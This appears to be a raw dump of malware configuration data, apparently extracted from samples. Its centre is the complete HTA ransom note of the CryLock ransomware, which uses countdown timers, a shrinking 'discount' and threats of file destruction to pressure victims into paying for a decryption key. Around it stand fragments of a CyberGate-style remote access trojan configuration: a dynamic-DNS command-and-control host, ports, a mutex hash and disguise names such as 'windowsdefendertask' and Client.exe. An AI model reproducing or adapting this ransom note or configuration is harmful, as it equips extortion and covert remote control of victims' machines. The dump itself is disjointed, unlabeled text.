fcea920f7412b5da7be0cf42b8c93759

esb6asg

wsd.exe

tor

[email protected]

[email protected]

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var max_discount = 50; var start_date = new Date('<%START_DATETIME%>'); var discount_date = new Date('<%DOUBLE_DATETIME%>'); var end_date = new Date('<%UNDECRYPT_DATETIME%>'); var main_contact = '<%MAIN_CONTACT%>'; var hid = '[<%HID%>]'; var second_contact = '<%RESERVE_CONTACT%>'; var sd = end_date; var dn = new Date(); var zoc, ddGlobal; function document.onblur() { alert('Attention! This important information for you!'); } function setContacts() { document.getElementById('main_contact').innerHTML = main_contact; document.getElementById('second_contact').innerHTML = second_contact; document.getElementById('hid').innerHTML = hid; } function countDiscount() { var term_current = new Date().getTime() - start_date.getTime(); var term_full = discount_date.getTime() - start_date.getTime(); var delta = discount_date.getTime() - new Date().getTime(); delta = new Date(delta); var dt = document.getElementById('pwr'); var timer_discount = document.getElementById('timer_discount'); var discount = document.getElementById('discount'); var hours_to_end = Math.floor(term_full / 1000 / 3600); var hours_current = Math.floor(term_current / 1000 / 3600); if (discount_date.getTime() > dn.getTime()) { var disc_per_hour = parseFloat(max_discount / hours_to_end).toFixed(2); var cur_discount = Math.floor(max_discount - (disc_per_hour * hours_current)); if (discount) { discount.innerHTML = cur_discount + '% discount'; } } if (cur_discount <= 25) { dt.style.cssText = 'border: 1px solid #FFC000;'; if (timer_discount) { timer_discount.style.background = '#FFC000'; } } if (sd.getTime() < dn.getTime() || cur_discount < 5) { dt.style.cssText = 'border: 1px solid #F53636; background-color: #F53636; padding: 16px 20px;'; dt.innerHTML = '<div style="font-size: 16px; color: #ffffff; text-align: center; display: block; font-weight: bold;">Decryption key can be bought at standard cost.</div><div style="font-size: 13px; color: #fff; text-align: center; margin-top: 10px">You need to hurry up to decrypt your data because all your files will be destroyed soon.</div>'; } var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } if (timer_discount) { timer_discount.innerHTML = dd + ' ' + hh+':'+mm+':'+ss; } } function ChangeTime() { var sd = end_date; var dn = new Date(); if (sd.getTime() < dn.getTime()) { var dt = document.getElementById('lctw'); dt.innerHTML = '<b>Soon, you won\'t be able to decrypt your files. Contact us immediately!</b>'; dt.style.cssText = 'background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px; text-align: center; font-size: 20px;'; zoc = 2; } else { var delta = sd.getTime() - dn.getTime(); delta = new Date(delta); var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); ddGlobal = parseInt(dd); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt = document.getElementById('file_lost'); if (dt) { dt.innerHTML= dd+' &nbsp;&nbsp;&nbsp; '+hh+':'+mm+':'+ss; } } } var count = 100, interval = 10, intervalID; function blink() { if (ddGlobal == 0 && zoc != 2) { var dt = document.getElementById('file_lost'); var dt2 = document.getElementById('text_file_lost'); var test = document.getElementById('test'); if (count == 100) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count - 2; if (count == 20) clearInterval(intervalId); }, interval); } if (count == 20) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count + 2; if (count == 100) clearInterval(intervalId); }, interval); } } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { var dt=document.getElementById('rc'); var xx=''; var i=0; while (i < 40) { xx=xx+getRandomArbitrary(0,2); i=i+1; } rc.innerHTML= xx; } function Start() { window.resizeTo(850,720); setContacts(); ChangeTime(); setInterval(ChangeTime, 1000); countDiscount(); setInterval(countDiscount, 1000); setInterval(blink, 100); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background: #000; font: 12px 'Arial', sans-serif; padding: 0; margin: 0;" onload="Start();"> <div style="height: 100%; position: absolute; top: 0; left: 0; background-color: #ffffff; box-sizing: border-box; padding: 20px; overflow-x: hidden;overflow-y: hidden;"> <div style="background-color: #000000; width: 100%; height: 55px;" id="header"> <div style="color: #F53636; font-weight: bold; font-size: 40px; text-transform: uppercase; line-height: 54px; padding-left: 8px; float: left;">ENCRYPTED</div> <div style="font-size: 18px; color: #7E7E7E; float: right; line-height: 55px; padding-right: 17px;" id="rc">11100001111011111111100001111011111100</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> <div> <div style="float: left; width: 144px; height: 110px; background-color: #000000; color: #ffffff; text-align: center; line-height: 1;"> <b style="display: block; font-size: 43px; margin-top: 24px;">What</b> <b style="display: block; font-size: 20px;">happened?</b> </div> <div style="float: right; width: 630px;"> <b style="font-size: 13px; color: #F53636;">All your documents, databases, backups, and other critical files were encrypted.</b> <div>Our software used the AES cryptographic algorithm (you can find related information in Wikipedia).</div> <br> <div>It happened because of security problems on your server, and you cannot use any of these files anymore. The only way to recover your data is to buy a decryption key from us. </div> <br> <div>To do this, please send your unique ID to the contacts below.</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> </div> <div> <div style="float: left; width: 540px;"> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(main_contact)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">E-mail:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="main_contact"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(hid)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">Unique ID:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="hid"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="margin-top: 17px; line-height: 18px;">Right after payment, we will send you a specific decoding software that will decrypt all of your files. If you have not received the response within 24 hours, please contact us by e-mail <span style="text-decoration: underline;" OnClick="copytext(second_contact)" id="second_contact"></span>.</div> </div> <div style="float: right; width: 230px;"> <div style="border: 1px solid #2FAB61;" id="pwr"> <div style="padding: 13px 14px 3px 14px; text-align: center; font-size: 14px;">During a short period, you can buy a decryption key with a </div> <div style="font-size: 25px; text-align: center; display: block; font-weight: bold;" id="discount">50% discount</div> <div id="timer_discount" style="margin-top: 10px; background-color: #219653; padding: 5px 0; text-align: center; font-size: 25px; font-weight: bold; color: #ffffff;">--:--:-- left</div> </div> <div style="margin-top: 17px; line-height: 18px;">The price depends on how soon you will contact us.</div> </div> <div style="clear: both; float: none;"></div> </div> <div style="background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px" id="lctw"> <div style="float: left; font-size: 20px; padding-top: 3px;" id="text_file_lost">All your files will be deleted permanently in:</div> <div style="float: right; font-size: 25px;" id="file_lost"></div> <div style="clear: both; float: none;"></div> </div> <div> <div style="float: left; width: 540px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">Attention! <div id="test"></div></b> <ul style="list-style: none; padding: 0; margin: 0;"> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not try to recover files yourself.</span> this process can damage your data and recovery will become impossible.</li> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not waste time trying to find the solution on the Internet.</span> The longer you wait, the higher will become the decryption key price.</li> <li style="position: relative; padding-left: 20px; font-size: 12px margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not contact any intermediaries.</span> They will buy the key from us and sell it to you at a higher price.</li> </ul> </div> <div style="float: right; width: 230px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">What guarantees do you have?</b> <div>Before payment, we can decrypt three files for free. The total file size should be less than 5MB (before archiving), and the files should not contain any important information (databases, backups, large tables, etc.)</div> </div> <div style="clear: both; float: none;"></div> </div> </div> </body> </html>

false

false

./logs

30

Notepad.exe

install

MicroDate.exe

true

false

Remote Administration anywhere in the world.

CyberGate

cybergate

TEGames

EPic

5BC4CE86FAA262ABB25BF6F183FF9ECA4822B37B

Client.exe

Logs

3000

windowsdefendertask

SubDir

true

grene231.ddns.net

8.8.4.4

65535

2018-12-09T09:11:12.426017136Z

true

true

false

4000

9017

Vala

true

1.048576e+07

30000

false

2500

1.048576e+07

050c3e25-856b-443b-ae6e-44a1fa0b6039

5000

false

grene231.ddns.net

8.8.8.8

true

5000

0

false

true

5000

false

1.2.2.0

8000

Steam

|-F-|